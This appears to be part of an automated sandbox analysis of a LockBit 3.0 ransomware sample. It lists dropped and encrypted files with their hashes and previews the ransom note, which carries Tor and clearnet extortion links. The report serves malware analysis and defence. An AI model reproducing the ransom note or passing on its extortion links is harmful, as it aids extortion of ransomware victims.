                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\HHHHHHHHHHH (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\IIIIIIIIIII (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\JJJJJJJJJJJ (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\KKKKKKKKKKK (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\LLLLLLLLLLL (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\MMMMMMMMMMM (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\NNNNNNNNNNN (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\OOOOOOOOOOO (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\PPPPPPPPPPP (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\QQQQQQQQQQQ (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\RRRRRRRRRRR (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\SSSSSSSSSSS (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\TTTTTTTTTTT (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\UUUUUUUUUUU (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\VVVVVVVVVVV (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\WWWWWWWWWWW (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\XXXXXXXXXXX (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\YYYYYYYYYYY (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\ZZZZZZZZZZZ (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.648786267034379
                Encrypted:false
                SSDEEP:3:tmr32a1DMP7m3FV0ntCMMTUKe4d+ZkRrCIejALNeIRD:k2a14P2+n4NUadLRiwRD
                MD5:417DB564F83879C1CA1B5B54BA2BFDE7
                SHA1:9DCEBD09298EF447BFEFEADEE19A5940AF49D905
                SHA-256:9385E8658BE9E763E3BA37EFF7E08FEE5B7741012B3778911FCFCB2DE14D2841
                SHA-512:4A9FAF8FDABDD8968BB755321B56A2C4168DEA6214649512366D63164EC83E98322808852D66B60DB61A06D30CEF20A8F2C724A6E9F9C0A31231B22D203E8D2E
                Malicious:false
                Preview:...C..S?~.1f.=cu8.h.....N:..0....$k6.3.o.[..4;...t,...Y1.0e.r5.t......[..G...}..#..0..y.....T..{z.....h.....E.D..n....

                C:\ProgramData\g0sOhfQ0Z.ico

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):15086
                Entropy (8bit):4.262047636092361
                Encrypted:false
                SSDEEP:192:jpBaAlHSa2vU9G/8MMBD7O1lXFMB8VMJP7:jpjmkMYD7IFMRx7
                MD5:88D9337C4C9CFE2D9AFF8A2C718EC76B
                SHA1:CE9F87183A1148816A1F777BA60A08EF5CA0D203
                SHA-256:95E059EF72686460884B9AEA5C292C22917F75D56FE737D43BE440F82034F438
                SHA-512:ABAFEA8CA4E85F47BEFB5AA3EFEE9EEE699EA87786FAFF39EE712AE498438D19A06BB31289643B620CB8203555EA4E2B546EF2F10D3F0087733BC0CEACCBEAFD
                Malicious:false
                Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\3D Objects\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:modified
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):462
                Entropy (8bit):7.5287802332570735
                Encrypted:false
                SSDEEP:12:oZ363d9uUC1Ptv0kz6VUHGvHfjDJpSOo6jXD2VJNAWnM+i+9BVzd:oI3fudlckWVkGvb9pSOlD2HNAX+i+9Bn
                MD5:86EC994814CE7DB9E4F696118006C500
                SHA1:B328EBF9DE3F5F05FB571D9BD6DB093E74B0A89C
                SHA-256:AB4594A9673B5DF773D4374E9D5A031302BBBDE62503CAEF5B6B58F2DDB50EBD
                SHA-512:41384F804F4ABBECD81986014BF95BF10413EF26610465DDA33E5997585283BCDFCB4A2D223176D2939D9824087FD4F3FC0F88801070F9E4CBD7CE57725A96DA
                Malicious:false
                Preview:...|......7.7*...(...|.57...T...y..1.........c_W.#'.>S..+O..?...G4.S.}............a.v;....,:p.....`.'.C.b,..2...=.Gz..._O@yBF..ubF.3H.....U.[......w...."?..<P(.n(N.g>.Q`.#.7..%....SC.4*...A.K1|.. ....#.`~.......^<.!-4...<u...p....i...k..i..G...<..3....@.h...)3.F|..S].w,1.....s|...|l..:.T>.>&.}.8.+..e...}.Fqe%w.*...-n..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):477
                Entropy (8bit):7.603603739402741
                Encrypted:false
                SSDEEP:12:f1hoiq7OBGUekUJyue6eRsLAFVD2VJNAWnM+i+9BVzd:f/oihBG1kUJyue6eRsLGD2HNAX+i+9Bn
                MD5:74EFDD49228D6954E6840EA34CD86826
                SHA1:02853F724967EABDD4DDB96ADB7C3E54DE14DAAD
                SHA-256:75DC793B866C065170D2F1FD01CD2791C0407F066287143EFEE7C6A0A4BF7242
                SHA-512:6FAD7DB8866749D62CE2B9916B9C6573C3E9CB39A1EB9E37D084F09021FB3686FD345809C4AC736754B9C85A5FAAAE37CA99965F2CE018E23A78ADFDD3567B1A
                Malicious:false
                Preview:..M..L...Q..(......).+.".."..H!...O..o..z~..f+X....G;b...h..3../1.}.....l..`. Nwas.mm]..x.j4[>d/.g..p..7mf....SJR.....F......../yf.ox.....a...G....y.~.......!.C..(..:.q.`..0. .}>:....v....H@tQv.O{.'..tw.R..`HY5D..x:....*....^<...5-F......M...[n2.s7;6b.G.Q.<P.3....C.h.=..0..?}..I@...."..#.%..C.d.W$A.....n$=...z.m[t=ww.g. .\.o....+..#q..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):434
                Entropy (8bit):7.491209794578922
                Encrypted:false
                SSDEEP:12:FGa4H3LRvWlcyVgBN1G+MfD2VJNAWnM+i+9BVzd:AHFWlBYA+MfD2HNAX+i+9BVR
                MD5:7283C2B3BBC689895C894E49B4B72A69
                SHA1:2F071A1796CCE68E143FE02C0801AF7A6B76FCAD
                SHA-256:440A1075E7A8B2E0CA617E11F554EAE8F3B2A53BD3641A948E19131BEFA085C6
                SHA-512:7556014EA859CD2676EAD6813B9BFD5D84F31313913D02C47A2A8E359FB979305B2D560485308F1E364F0A860F6EF8B478A9D26262A6571655ED5595E23E380F
                Malicious:false
